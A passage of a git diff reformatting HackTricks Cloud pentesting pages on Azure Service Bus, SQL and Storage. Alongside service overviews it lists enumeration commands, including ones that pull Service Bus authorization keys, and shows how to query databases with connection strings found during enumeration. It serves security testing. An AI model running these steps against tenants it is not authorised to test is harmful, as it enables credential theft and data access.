 - **Message Sessions**: Ensures FIFO processing and supports request-response patterns.
@@ -49,21 +37,20 @@ Some advance features are:
 
 SAS Policies define the access permissions for Azure Service Bus entities namespace (Most Important One), queues and topics. Each policy has the following components:
 
- - **Permissions**: Checkboxes to specify access levels:
-    - Manage: Grants full control over the entity, including configuration and permissions management.
-    - Send: Allows sending messages to the entity.
-    - Listen: Allows receiving messages from the entity.
- - **Primary and Secondary Keys**: These are cryptographic keys used to generate secure tokens for authenticating access.
- - **Primary and Secondary Connection Strings**: Pre-configured connection strings that include the endpoint and key for easy use in applications.
- - **SAS Policy ARM ID**: The Azure Resource Manager (ARM) path to the policy for programmatic identification.
+- **Permissions**: Checkboxes to specify access levels:
+  - Manage: Grants full control over the entity, including configuration and permissions management.
+  - Send: Allows sending messages to the entity.
+  - Listen: Allows receiving messages from the entity.
+- **Primary and Secondary Keys**: These are cryptographic keys used to generate secure tokens for authenticating access.
+- **Primary and Secondary Connection Strings**: Pre-configured connection strings that include the endpoint and key for easy use in applications.
+- **SAS Policy ARM ID**: The Azure Resource Manager (ARM) path to the policy for programmatic identification.
 
 ### NameSpace
 
-sku, authrorization rule, 
+sku, authrorization rule,
 
 ### Enumeration
 
-{% code overflow="wrap" %}
 ```bash
 # Queue Enumeration
 az servicebus queue list --resource-group  --namespace-name 
@@ -91,33 +78,23 @@ az servicebus queue authorization-rule list --resource-group  -
 az servicebus topic authorization-rule list --resource-group  --namespace-name  --topic-name 
 az servicebus namespace authorization-rule keys list --resource-group  --namespace-name  --name 
 ```
-{% endcode %}
 
 ### Privilege Escalation
 
-{% content-ref url="../az-services/az-servicebus-privesc.md" %}
-[az-servicebus-privesc.md](../az-services/az-servicebus-privesc.md)
-{% endcontent-ref %}
+{{#ref}}
+../az-privilege-escalation/az-servicebus-privesc.md
+{{#endref}}
 
 ### Post Exploitation
 
-{% content-ref url="../az-post-exploitation/az-servicebus-post-exploitation.md" %}
-[az-servicebus-post-exploitation.md](../az-post-exploitation/az-servicebus-post-exploitation.md)
-{% endcontent-ref %}
+{{#ref}}
+../az-post-exploitation/az-servicebus-post-exploitation.md
+{{#endref}}
 
 ## References
 
-* https://learn.microsoft.com/en-us/powershell/module/az.servicebus/?view=azps-13.0.0
-* https://learn.microsoft.com/en-us/azure/service-bus-messaging/service-bus-messaging-overview
-* https://learn.microsoft.com/en-us/azure/service-bus-messaging/service-bus-quickstart-cli
+- https://learn.microsoft.com/en-us/powershell/module/az.servicebus/?view=azps-13.0.0
+- https://learn.microsoft.com/en-us/azure/service-bus-messaging/service-bus-messaging-overview
+- https://learn.microsoft.com/en-us/azure/service-bus-messaging/service-bus-quickstart-cli
 
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/pentesting-cloud/azure-security/az-services/az-sql.md b/src/pentesting-cloud/azure-security/az-services/az-sql.md
similarity index 70%
rename from pentesting-cloud/azure-security/az-services/az-sql.md
rename to src/pentesting-cloud/azure-security/az-services/az-sql.md
index f99fc4da5..91a4b2cb4 100644
--- a/pentesting-cloud/azure-security/az-services/az-sql.md
+++ b/src/pentesting-cloud/azure-security/az-services/az-sql.md
@@ -1,21 +1,9 @@
 # Az - SQL
 
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../../../banners/hacktricks-training.md}}
 
 ## Azure SQL
+
 Azure SQL is a family of managed, secure, and intelligent products that use the **SQL Server database engine in the Azure cloud**. This means you don't have to worry about the physical administration of your servers, and you can focus on managing your data.
 
 Azure SQL consists of three main offerings:
@@ -30,58 +18,56 @@ Azure SQL consists of three main offerings:
 
 #### Key Features
 
-* **Always Up-to-Date**: Runs on the latest stable version of SQL Server and Receives new features and patches automatically.
-* **PaaS Capabilities**: Built-in high availability, backups, and updates.
-* **Data Flexibility**: Supports relational and non-relational data (e.g., graphs, JSON, spatial, and XML).
+- **Always Up-to-Date**: Runs on the latest stable version of SQL Server and Receives new features and patches automatically.
+- **PaaS Capabilities**: Built-in high availability, backups, and updates.
+- **Data Flexibility**: Supports relational and non-relational data (e.g., graphs, JSON, spatial, and XML).
 
 #### Purchasing Models / Service Tiers
 
-* **vCore-based**: Choose compute, memory, and storage independently. For General Purpose, Business Critical (with high resilience and performance for OLTP apps), and scales up to 128 TB storag
-* **DTU-based**: Bundles compute, memory, and I/O into fixed tiers. Balanced resources for common tasks.
-    * Standard: Balanced resources for common tasks.
-    * Premium: High performance for demanding workloads.
+- **vCore-based**: Choose compute, memory, and storage independently. For General Purpose, Business Critical (with high resilience and performance for OLTP apps), and scales up to 128 TB storag
+- **DTU-based**: Bundles compute, memory, and I/O into fixed tiers. Balanced resources for common tasks.
+  - Standard: Balanced resources for common tasks.
+  - Premium: High performance for demanding workloads.
 
 #### Deployment Models
 
 Azure SQL Database supports flexible deployment options to suit various needs:
 
-* **Single Database**:
-    * A fully isolated database with its own dedicated resources.
-    * Great for microservices or applications requiring a single data source.
-* **Elastic Pool**:
-    * Allows multiple databases to share resources within a pool.
-    * Cost-efficient for applications with fluctuating usage patterns across multiple databases.
+- **Single Database**:
+  - A fully isolated database with its own dedicated resources.
+  - Great for microservices or applications requiring a single data source.
+- **Elastic Pool**:
+  - Allows multiple databases to share resources within a pool.
+  - Cost-efficient for applications with fluctuating usage patterns across multiple databases.
 
 #### Scalable performance and pools
 
-* **Single Databases**: Each database is isolated and has its own dedicated compute, memory, and storage resources. Resources can be scaled dynamically (up or down) without downtime (1–128 vCores, 32 GB–4 TB storage, and up to 128 TB).
-* **Elastic Pools**: Share resources across multiple databases in a pool to maximize efficiency and save costs. Resources can also be scaled dynamically for the entire pool.
-* **Service Tier Flexibility**: Start small with a single database in the General Purpose tier. Upgrade to Business Critical or Hyperscale tiers as needs grow.
-* **Scaling Options**: Dynamic Scaling or Autoscaling Alternatives.
-
+- **Single Databases**: Each database is isolated and has its own dedicated compute, memory, and storage resources. Resources can be scaled dynamically (up or down) without downtime (1–128 vCores, 32 GB–4 TB storage, and up to 128 TB).
+- **Elastic Pools**: Share resources across multiple databases in a pool to maximize efficiency and save costs. Resources can also be scaled dynamically for the entire pool.
+- **Service Tier Flexibility**: Start small with a single database in the General Purpose tier. Upgrade to Business Critical or Hyperscale tiers as needs grow.
+- **Scaling Options**: Dynamic Scaling or Autoscaling Alternatives.
 
 #### Built-In Monitoring & Optimization
 
-* **Query Store**: Tracks performance issues, identifies top resource consumers, and offers actionable recommendations.
-* **Automatic Tuning**: Proactively optimizes performance with features like automatic indexing and query plan corrections.
-* **Telemetry Integration**: Supports monitoring through Azure Monitor, Event Hubs, or Azure Storage for tailored insights.
+- **Query Store**: Tracks performance issues, identifies top resource consumers, and offers actionable recommendations.
+- **Automatic Tuning**: Proactively optimizes performance with features like automatic indexing and query plan corrections.
+- **Telemetry Integration**: Supports monitoring through Azure Monitor, Event Hubs, or Azure Storage for tailored insights.
 
 #### Disaster Recovery & Availavility
 
-* **Automatic backups**: SQL Database automatically performs full, differential, and transaction log backups of databases
-* **Point-in-Time Restore**: Recover databases to any past state within the backup retention period.
-* **Geo-Redundancy**
-* **Failover Groups**: Simplifies disaster recovery by grouping databases for automatic failover across regions.
+- **Automatic backups**: SQL Database automatically performs full, differential, and transaction log backups of databases
+- **Point-in-Time Restore**: Recover databases to any past state within the backup retention period.
+- **Geo-Redundancy**
+- **Failover Groups**: Simplifies disaster recovery by grouping databases for automatic failover across regions.
 
 ### Azure SQL Managed Instance
 
-**Azure SQL Managed Instance** is a Platform as a Service (PaaS) database engine that offers near 100% compatibility with SQL Server and handles most management tasks (e.g., upgrading, patching, backups, monitoring) automatically. It provides a cloud solution for migrating on-premises SQL Server databases with minimal changes. 
+**Azure SQL Managed Instance** is a Platform as a Service (PaaS) database engine that offers near 100% compatibility with SQL Server and handles most management tasks (e.g., upgrading, patching, backups, monitoring) automatically. It provides a cloud solution for migrating on-premises SQL Server databases with minimal changes.
 
 #### Service Tiers
 
-* **General Purpose**: Cost-effective option for applications with standard I/O and latency requirements.
-* **Business Critical**: High-performance option with low I/O latency for critical workloads.
-
+- **General Purpose**: Cost-effective option for applications with standard I/O and latency requirements.
+- **Business Critical**: High-performance option with low I/O latency for critical workloads.
 
 #### Advanced Security Features
 
@@ -109,15 +95,15 @@ Azure SQL Database supports flexible deployment options to suit various needs:
 
 ## Enumeration
 
-{% tabs %}
-{% tab title="az cli" %}
-{% code overflow="wrap" %}
+{{#tabs}}
+{{#tab name="az cli"}}
+
 ```bash
 # List Servers
 az sql server list # --output table
 ## List Server Usages
 az sql server list-usages --name  --resource-group 
-## List Server Firewalls 
+## List Server Firewalls
 az sql server firewall-rule list --resource-group  --server 
 ## List of Azure Active Directory administrators in a server.
 az sql server ad-admin list --resource-group  --server 
@@ -178,11 +164,11 @@ az sql midb show --resource-group  --name 
 az sql vm list
 az sql vm show --resource-group  --name 
 ```
-{% endcode %}
-{% endtab %}
 
-{% tab title="Az PowerShell" %}
-{% code overflow="wrap" %}
+{{#endtab}}
+
+{{#tab name="Az PowerShell"}}
+
 ```powershell
 # List Servers
 Get-AzSqlServer -ResourceGroupName ""
@@ -220,15 +206,14 @@ Get-AzSqlInstanceDatabase -ResourceGroupName  -InstanceName <
 # Lis all sql VM
 Get-AzSqlVM
 ```
-{% endcode %}
-{% endtab %}
-{% endtabs %}
+
+{{#endtab}}
+{{#endtabs}}
 
 ### Connect and run SQL queries
 
 You could find a connection string (containing credentials) from example [enumerating an Az WebApp](az-app-services.md):
 
-{% code overflow="wrap" %}
 ```powershell
 function invoke-sql{
     param($query)
@@ -248,44 +233,29 @@ function invoke-sql{
 invoke-sql 'Select Distinct TABLE_NAME From information_schema.TABLES;'
 ```
 
-You can also use sqlcmd to access the database. It is important to know if the server allows public connections ```az sql server show --name  --resource-group ```, and also if it the firewall rule let's our IP to access:
-{% code overflow="wrap" %}
+You can also use sqlcmd to access the database. It is important to know if the server allows public connections `az sql server show --name  --resource-group `, and also if it the firewall rule let's our IP to access:
+
 ```powershell
 sqlcmd -S .database.windows.net -U  -P  -d 
 ```
-{% endcode %}
 
 ## References
 
-* [https://learn.microsoft.com/en-us/azure/azure-sql/azure-sql-iaas-vs-paas-what-is-overview?view=azuresql](https://learn.microsoft.com/en-us/azure/azure-sql/azure-sql-iaas-vs-paas-what-is-overview?view=azuresql)
-* [https://learn.microsoft.com/en-us/azure/azure-sql/database/single-database-overview?view=azuresql](https://learn.microsoft.com/en-us/azure/azure-sql/database/single-database-overview?view=azuresql)
-* [https://learn.microsoft.com/en-us/azure/azure-sql/managed-instance/sql-managed-instance-paas-overview?view=azuresql](https://learn.microsoft.com/en-us/azure/azure-sql/managed-instance/sql-managed-instance-paas-overview?view=azuresql)
-* [https://learn.microsoft.com/en-us/azure/azure-sql/virtual-machines/windows/sql-server-on-azure-vm-iaas-what-is-overview?view=azuresql](https://learn.microsoft.com/en-us/azure/azure-sql/virtual-machines/windows/sql-server-on-azure-vm-iaas-what-is-overview?view=azuresql)
+- [https://learn.microsoft.com/en-us/azure/azure-sql/azure-sql-iaas-vs-paas-what-is-overview?view=azuresql](https://learn.microsoft.com/en-us/azure/azure-sql/azure-sql-iaas-vs-paas-what-is-overview?view=azuresql)
+- [https://learn.microsoft.com/en-us/azure/azure-sql/database/single-database-overview?view=azuresql](https://learn.microsoft.com/en-us/azure/azure-sql/database/single-database-overview?view=azuresql)
+- [https://learn.microsoft.com/en-us/azure/azure-sql/managed-instance/sql-managed-instance-paas-overview?view=azuresql](https://learn.microsoft.com/en-us/azure/azure-sql/managed-instance/sql-managed-instance-paas-overview?view=azuresql)
+- [https://learn.microsoft.com/en-us/azure/azure-sql/virtual-machines/windows/sql-server-on-azure-vm-iaas-what-is-overview?view=azuresql](https://learn.microsoft.com/en-us/azure/azure-sql/virtual-machines/windows/sql-server-on-azure-vm-iaas-what-is-overview?view=azuresql)
 
 ## Privilege Escalation
 
-{% content-ref url="../az-privilege-escalation/az-sql-privesc.md" %}
-[az-sql-privesc.md](../az-privilege-escalation/az-sql-privesc.md)
-{% endcontent-ref %}
+{{#ref}}
+../az-privilege-escalation/az-sql-privesc.md
+{{#endref}}
 
 ## Post Exploitation
 
-{% content-ref url="../az-post-exploitation/az-sql-post-exploitation.md" %}
-[az-sql-post-exploitation.md](../az-post-exploitation/az-sql-post-exploitation.md)
-{% endcontent-ref %}
+{{#ref}}
+../az-post-exploitation/az-sql-post-exploitation.md
+{{#endref}}
 
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/pentesting-cloud/azure-security/az-services/az-storage.md b/src/pentesting-cloud/azure-security/az-services/az-storage.md
similarity index 62%
rename from pentesting-cloud/azure-security/az-services/az-storage.md
rename to src/pentesting-cloud/azure-security/az-services/az-storage.md
index 9a26f4fbf..1f7427324 100644
--- a/pentesting-cloud/azure-security/az-services/az-storage.md
+++ b/src/pentesting-cloud/azure-security/az-services/az-storage.md
@@ -1,19 +1,6 @@
 # Az - Storage Accounts & Blobs
 
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../../../banners/hacktricks-training.md}}
 
 ## Basic Information
 
@@ -21,48 +8,48 @@ Azure Storage Accounts are fundamental services in Microsoft Azure that provide
 
 **Main configuration options**:
 
-* Every storage account must have a **uniq name across all Azure**.
-* Every storage account is deployed in a **region** or in an Azure extended zone
-* It's possible to select the **premium** version of the storage account for better performance
-* It's possible to select among **4 types of redundancy to protect** against rack, drive and datacenter **failures**.
+- Every storage account must have a **uniq name across all Azure**.
+- Every storage account is deployed in a **region** or in an Azure extended zone
+- It's possible to select the **premium** version of the storage account for better performance
+- It's possible to select among **4 types of redundancy to protect** against rack, drive and datacenter **failures**.
 
 **Security configuration options**:
 
-* **Require secure transfer for REST API operations**: Require TLS in any communication with the storage
-* **Allows enabling anonymous access on individual containers**: If not, it won't be possible to enable anonymous access in the future
-* **Enable storage account key access**: If not, access with Shared Keys will be forbidden
-* **Minimum TLS version**
-* **Permitted scope for copy operations**: Allow from any storage account, from any storage account from the same Entra tenant or from storage account with private endpoints in the same virtual network.
+- **Require secure transfer for REST API operations**: Require TLS in any communication with the storage
+- **Allows enabling anonymous access on individual containers**: If not, it won't be possible to enable anonymous access in the future
+- **Enable storage account key access**: If not, access with Shared Keys will be forbidden
+- **Minimum TLS version**
+- **Permitted scope for copy operations**: Allow from any storage account, from any storage account from the same Entra tenant or from storage account with private endpoints in the same virtual network.
 
 **Blob Storage options**:
 
-* **Allow cross-tenant replication**
-* **Access tier**: Hot (frequently access data), Cool and Cold (rarely accessed data)
+- **Allow cross-tenant replication**
+- **Access tier**: Hot (frequently access data), Cool and Cold (rarely accessed data)
 
 **Networking options**:
 
-* **Network access**:
-  * Allow from all networks
-  * Allow from selected virtual networks and IP addresses
-  * Disable public access and use private access
-* **Private endpoints**: It allows a private connection to the storage account from a virtual network
+- **Network access**:
+  - Allow from all networks
+  - Allow from selected virtual networks and IP addresses
+  - Disable public access and use private access
+- **Private endpoints**: It allows a private connection to the storage account from a virtual network
 
 **Data protection options**:
 
-* **Point-in-time restore for containers**: Allows to restore containers to an earlier state
-  * It requires versioning, change feed, and blob soft delete to be enabled.
-* **Enable soft delete for blobs**: It enables a retention period in days for deleted blobs (even overwritten)
-* **Enable soft delete for containers**: It enables a retention period in days for deleted containers
-* **Enable soft delete for file shares**: It enables a retention period in days for deleted file shared
-* **Enable versioning for blobs**: Maintain previous versions of your blobs
-* **Enable blob change feed**: Keep logs of create, modification, and delete changes to blobs
-* **Enable version-level immutability support**: Allows you to set time-based retention policy on the account-level that will apply to all blob versions.
-  * Version-level immutability support and point-in-time restore for containers cannot be enabled simultaneously.
+- **Point-in-time restore for containers**: Allows to restore containers to an earlier state
+  - It requires versioning, change feed, and blob soft delete to be enabled.
+- **Enable soft delete for blobs**: It enables a retention period in days for deleted blobs (even overwritten)
+- **Enable soft delete for containers**: It enables a retention period in days for deleted containers
+- **Enable soft delete for file shares**: It enables a retention period in days for deleted file shared
+- **Enable versioning for blobs**: Maintain previous versions of your blobs
+- **Enable blob change feed**: Keep logs of create, modification, and delete changes to blobs
+- **Enable version-level immutability support**: Allows you to set time-based retention policy on the account-level that will apply to all blob versions.
+  - Version-level immutability support and point-in-time restore for containers cannot be enabled simultaneously.
 
 **Encryption configuration options**:
 
-* **Encryption type**: It's possible to use Microsoft-managed keys (MMK) or Customer-managed keys (CMK)
-* **Enable infrastructure encryption**: Allows to double encrypt the data "for more security"
+- **Encryption type**: It's possible to use Microsoft-managed keys (MMK) or Customer-managed keys (CMK)
+- **Enable infrastructure encryption**: Allows to double encrypt the data "for more security"
 
 ### Storage endpoints
 
@@ -72,9 +59,9 @@ Azure Storage Accounts are fundamental services in Microsoft Azure that provide
 
 If "Allow Blob public access" is **enabled** (disabled by default), when creating a container it's possible to:
 
-* Give **public access to read blobs** (you need to know the name).
-* **List container blobs** and **read** them.
-* Make it fully **private**
+- Give **public access to read blobs** (you need to know the name).
+- **List container blobs** and **read** them.
+- Make it fully **private**
 
 

 
@@ -92,61 +79,59 @@ It's possible to use Entra ID principals with **RBAC roles** to access storage a
 
 The storage accounts have access keys that can be used to access it. This provides f**ull access to the storage account.**
 
-

+

 
 ### **Shared Keys & Lite Shared Keys**
 
 It's possible to [**generate Shared Keys**](https://learn.microsoft.com/en-us/rest/api/storageservices/authorize-with-shared-key) signed with the access keys to authorize access to certain resources via a signed URL.
 
-{% hint style="info" %}
-Note that the `CanonicalizedResource` part represents the storage services resource (URI). And if any part in the URL is encoded, it should also be encoded inside the `CanonicalizedResource`.
-{% endhint %}
+> [!NOTE]
+> Note that the `CanonicalizedResource` part represents the storage services resource (URI). And if any part in the URL is encoded, it should also be encoded inside the `CanonicalizedResource`.
 
-{% hint style="info" %}
-This is **used by default by `az` cli** to authenticate requests. To make it use the Entra ID principal credentials indicate the param `--auth-mode login`.
-{% endhint %}
+> [!NOTE]
+> This is **used by default by `az` cli** to authenticate requests. To make it use the Entra ID principal credentials indicate the param `--auth-mode login`.
 
-* It's possible to generate a **shared key for blob, queue and file services** signing the following information:
+- It's possible to generate a **shared key for blob, queue and file services** signing the following information:
 
 ```bash
-StringToSign = VERB + "\n" +  
-               Content-Encoding + "\n" +  
-               Content-Language + "\n" +  
-               Content-Length + "\n" +  
-               Content-MD5 + "\n" +  
-               Content-Type + "\n" +  
-               Date + "\n" +  
-               If-Modified-Since + "\n" +  
-               If-Match + "\n" +  
-               If-None-Match + "\n" +  
-               If-Unmodified-Since + "\n" +  
-               Range + "\n" +  
-               CanonicalizedHeaders +   
+StringToSign = VERB + "\n" +
+               Content-Encoding + "\n" +
+               Content-Language + "\n" +
+               Content-Length + "\n" +
+               Content-MD5 + "\n" +
+               Content-Type + "\n" +
+               Date + "\n" +
+               If-Modified-Since + "\n" +
+               If-Match + "\n" +
+               If-None-Match + "\n" +
+               If-Unmodified-Since + "\n" +
+               Range + "\n" +
+               CanonicalizedHeaders +
                CanonicalizedResource;
 ```
 
-* It's possible to generate a **shared key for table services** signing the following information:
+- It's possible to generate a **shared key for table services** signing the following information:
 
 ```bash
 StringToSign = VERB + "\n" +
                Content-MD5 + "\n" +
-               Content-Type + "\n" +  
-               Date + "\n" +  
+               Content-Type + "\n" +
+               Date + "\n" +
                CanonicalizedResource;
 ```
 
-* It's possible to generate a **lite shared key for blob, queue and file services** signing the following information:
+- It's possible to generate a **lite shared key for blob, queue and file services** signing the following information:
 
 ```bash
-StringToSign = VERB + "\n" +  
-               Content-MD5 + "\n" +  
-               Content-Type + "\n" +  
-               Date + "\n" +  
-               CanonicalizedHeaders +   
+StringToSign = VERB + "\n" +
+               Content-MD5 + "\n" +
+               Content-Type + "\n" +
+               Date + "\n" +
+               CanonicalizedHeaders +
                CanonicalizedResource;
 ```
 
-* It's possible to generate a **lite shared key for table services** signing the following information:
+- It's possible to generate a **lite shared key for table services** signing the following information:
 
 ```bash
 StringToSign = Date + "\n"
@@ -160,10 +145,10 @@ Authorization="[SharedKey|SharedKeyLite] :"
 #e.g.
 Authorization: SharedKey myaccount:ctzMq410TV3wS7upTBcunJTDLEJwMAZuFPfr0mrrA08=
 
-PUT http://myaccount/mycontainer?restype=container&timeout=30 HTTP/1.1 
- x-ms-version: 2014-02-14 
- x-ms-date: Fri, 26 Jun 2015 23:39:12 GMT 
- Authorization: SharedKey myaccount:ctzMq410TV3wS7upTBcunJTDLEJwMAZuFPfr0mrrA08= 
+PUT http://myaccount/mycontainer?restype=container&timeout=30 HTTP/1.1
+ x-ms-version: 2014-02-14
+ x-ms-date: Fri, 26 Jun 2015 23:39:12 GMT
+ Authorization: SharedKey myaccount:ctzMq410TV3wS7upTBcunJTDLEJwMAZuFPfr0mrrA08=
  Content-Length: 0
 ```
 
@@ -173,30 +158,30 @@ Shared Access Signatures (SAS) are secure, time-limited URLs that **grant specif
 
 #### SAS Types
 
-* **User delegation SAS**: This is created from an **Entra ID principal** which will sign the SAS and delegate the permissions from the user to the SAS. It can only be used with **blob and data lake storage** ([docs](https://learn.microsoft.com/en-us/rest/api/storageservices/create-user-delegation-sas)). It's possible to **revoke** all generated user delegated SAS.
-  * Even if it's possible to generate a delegation SAS with "more" permissions than the ones the user has. However, if the principal doesn't have them, it won't work (no privesc).
-* **Service SAS**: This is signed using one of the storage account **access keys**. It can be used to grant access to specific resources in a single storage service. If the key is renewed, the SAS will stop working.
-* **Account SAS**: It's also signed with one of the storage account **access keys**. It grants access to resources across a storage account services (Blob, Queue, Table, File) and can include service-level operations.
+- **User delegation SAS**: This is created from an **Entra ID principal** which will sign the SAS and delegate the permissions from the user to the SAS. It can only be used with **blob and data lake storage** ([docs](https://learn.microsoft.com/en-us/rest/api/storageservices/create-user-delegation-sas)). It's possible to **revoke** all generated user delegated SAS.
+  - Even if it's possible to generate a delegation SAS with "more" permissions than the ones the user has. However, if the principal doesn't have them, it won't work (no privesc).
+- **Service SAS**: This is signed using one of the storage account **access keys**. It can be used to grant access to specific resources in a single storage service. If the key is renewed, the SAS will stop working.
+- **Account SAS**: It's also signed with one of the storage account **access keys**. It grants access to resources across a storage account services (Blob, Queue, Table, File) and can include service-level operations.
 
 A SAS URL signed by an **access key** looks like this:
 
-* `https://.blob.core.windows.net/newcontainer?sp=r&st=2021-09-26T18:15:21Z&se=2021-10-27T02:14:21Z&spr=https&sv=2021-07-08&sr=c&sig=7S%2BZySOgy4aA3Dk0V1cJyTSIf1cW%2Fu3WFkhHV32%2B4PE%3D`
+- `https://.blob.core.windows.net/newcontainer?sp=r&st=2021-09-26T18:15:21Z&se=2021-10-27T02:14:21Z&spr=https&sv=2021-07-08&sr=c&sig=7S%2BZySOgy4aA3Dk0V1cJyTSIf1cW%2Fu3WFkhHV32%2B4PE%3D`
 
 A SAS URL signed as a **user delegation** looks like this:
 
-* `https://.blob.core.windows.net/testing-container?sp=r&st=2024-11-22T15:07:40Z&se=2024-11-22T23:07:40Z&skoid=d77c71a1-96e7-483d-bd51-bd753aa66e62&sktid=fdd066e1-ee37-49bc-b08f-d0e152119b04&skt=2024-11-22T15:07:40Z&ske=2024-11-22T23:07:40Z&sks=b&skv=2022-11-02&spr=https&sv=2022-11-02&sr=c&sig=7s5dJyeE6klUNRulUj9TNL0tMj2K7mtxyRc97xbYDqs%3D`
+- `https://.blob.core.windows.net/testing-container?sp=r&st=2024-11-22T15:07:40Z&se=2024-11-22T23:07:40Z&skoid=d77c71a1-96e7-483d-bd51-bd753aa66e62&sktid=fdd066e1-ee37-49bc-b08f-d0e152119b04&skt=2024-11-22T15:07:40Z&ske=2024-11-22T23:07:40Z&sks=b&skv=2022-11-02&spr=https&sv=2022-11-02&sr=c&sig=7s5dJyeE6klUNRulUj9TNL0tMj2K7mtxyRc97xbYDqs%3D`
 
 Note some **http params**:
 
-* The **`se`** param indicates the **expiration date** of the SAS
-* The **`sp`** param indicates the **permissions** of the SAS
-* The **`sig`** is the **signature** validating the SAS
+- The **`se`** param indicates the **expiration date** of the SAS
+- The **`sp`** param indicates the **permissions** of the SAS
+- The **`sig`** is the **signature** validating the SAS
 
 #### SAS permissions
 
 When generating a SAS it's needed to indicate the permissions that it should be granting. Depending on the objet the SAS is being generated over different permissions might be included. For example:
 
-* (a)dd, (c)reate, (d)elete, (e)xecute, (f)ilter\_by\_tags, (i)set\_immutability\_policy, (l)ist, (m)ove, (r)ead, (t)ag, (w)rite, (x)delete\_previous\_version, (y)permanent\_delete
+- (a)dd, (c)reate, (d)elete, (e)xecute, (f)ilter_by_tags, (i)set_immutability_policy, (l)ist, (m)ove, (r)ead, (t)ag, (w)rite, (x)delete_previous_version, (y)permanent_delete
 
 ## SFTP Support for Azure Blob Storage
 
@@ -206,8 +191,8 @@ Azure Blob Storage now supports the SSH File Transfer Protocol (SFTP), enabling
 
 - Protocol Support: SFTP works with Blob Storage accounts configured with hierarchical namespace (HNS). This organizes blobs into directories and subdirectories for easier navigation.
 - Security: SFTP uses local user identities for authentication and does not integrate with RBAC or ABAC. Each local user can authenticate via:
-    - Azure-generated passwords
-    - Public-private SSH key pairs
+  - Azure-generated passwords
+  - Public-private SSH key pairs
 - Granular Permissions: Permissions such as Read, Write, Delete, and List can be assigned to local users for up to 100 containers.
 - Networking Considerations: SFTP connections are made through port 22. Azure supports network configurations like firewalls, private endpoints, or virtual networks to secure SFTP traffic.
 
@@ -216,27 +201,27 @@ Azure Blob Storage now supports the SSH File Transfer Protocol (SFTP), enabling
 - Hierarchical Namespace: HNS must be enabled when creating the storage account.
 - Supported Encryption: Requires Microsoft Security Development Lifecycle (SDL)-approved cryptographic algorithms (e.g., rsa-sha2-256, ecdsa-sha2-nistp256).
 - SFTP Configuration:
-    - Enable SFTP on the storage account.
-    - Create local user identities with appropriate permissions.
-    - Configure home directories for users to define their starting location within the container.
+  - Enable SFTP on the storage account.
+  - Create local user identities with appropriate permissions.
+  - Configure home directories for users to define their starting location within the container.
 
 ### Permissions
 
-| Permission       | Symbol | Description                                |
-|-------------------|--------|--------------------------------------------|
-| **Read**         | `r`    | Read file content.                         |
-| **Write**        | `w`    | Upload files and create directories.       |
-| **List**         | `l`    | List contents of directories.              |
-| **Delete**       | `d`    | Delete files or directories.               |
-| **Create**       | `c`    | Create files or directories.               |
-| **Modify Ownership** | `o` | Change the owning user or group.           |
-| **Modify Permissions** | `p` | Change ACLs on files or directories.      |
+| Permission             | Symbol | Description                          |
+| ---------------------- | ------ | ------------------------------------ |
+| **Read**               | `r`    | Read file content.                   |
+| **Write**              | `w`    | Upload files and create directories. |
+| **List**               | `l`    | List contents of directories.        |
+| **Delete**             | `d`    | Delete files or directories.         |
+| **Create**             | `c`    | Create files or directories.         |
+| **Modify Ownership**   | `o`    | Change the owning user or group.     |
+| **Modify Permissions** | `p`    | Change ACLs on files or directories. |
 
 ## Enumeration
 
-{% tabs %}
-{% tab title="az cli" %}
-{% code overflow="wrap" %}
+{{#tabs }}
+{{#tab name="az cli" }}
+
 ```bash
 # Get storage accounts
 az storage account list #Get the account name from here
@@ -320,7 +305,7 @@ az storage  generate-sas \
   --account-name  \
